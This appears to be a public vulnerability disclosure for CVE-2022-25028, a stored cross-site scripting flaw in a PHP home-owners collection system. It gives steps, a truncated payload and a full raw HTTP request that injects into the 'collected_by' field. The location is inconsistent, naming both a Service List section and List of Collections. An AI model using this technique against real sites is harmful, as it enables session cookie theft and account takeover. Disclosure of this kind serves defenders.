Headline
CVE-2022-25028
Home Owners Collection Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the collected_by parameter under the List of Collections module.
## [Home Owners Collection Management System](https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html) ## [Vendor](https://www.sourcecodester.com/users/tips23) ### Exploit Title:Home Owners Collection Management System - ‘collected_by’ Stored Cross Site Scripting (XSS) ### Exploit Author: fuuzyap1 ### Description: A Stored Cross Site Scripting (XSS) vulnerability exists in Home Owners Collection Management System 1.0 via the Service List Section in login panel. an attacker can steal the cookies leading to Full Account Takeover. ### Exploit: Login to the admin panel http://localhost/classes/Master.php?f=save_collection Navigate to List of Collections and click on edit New button. Inject the below payload in collected_by parameter ![image](https://user-images.githubusercontent.com/95869214/153041269-7d068b93-6a7b-4e9a-922c-f1b1b24c7a46.png) ![image](https://user-images.githubusercontent.com/95869214/153041503-e9a65bd1-fb93-49a6-8261-51dc2a56c3c8.png) payload: ``` Sample Collector1231" ``` requests: ``` POST /classes/Master.php?f=save_collection HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------144369869742587923891614191865 Content-Length: 1761 Origin: http://localhost Connection: close Referer: http://localhost/admin/?page=collections Cookie: PHPSESSID=06uv4t86d27aq8auhuohh947s8 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="id" 1 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="date_collected" 2022-02-08 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="collected_by" Sample Collector1231" -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="member_id" 1 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="fee[3]" 100 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="category_id[3]" 3 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="fee[4]" 100 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="category_id[4]" 4 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="fee[1]" 200 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="category_id[1]" 1 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="fee[5]" 50 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="fee[2]" 200 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="category_id[2]" 2 -----------------------------144369869742587923891614191865 Content-Disposition: form-data; name="total_amount" 600 -----------------------------144369869742587923891614191865-- #### Proof and Exploit: ![image](https://user-images.githubusercontent.com/95869214/153044852-cfaff0e0-ebcc-4e45-9428-69fe810f8ea3.png) ### Impact: An attacker can able to inject malicious JavaScript code in Service List Section.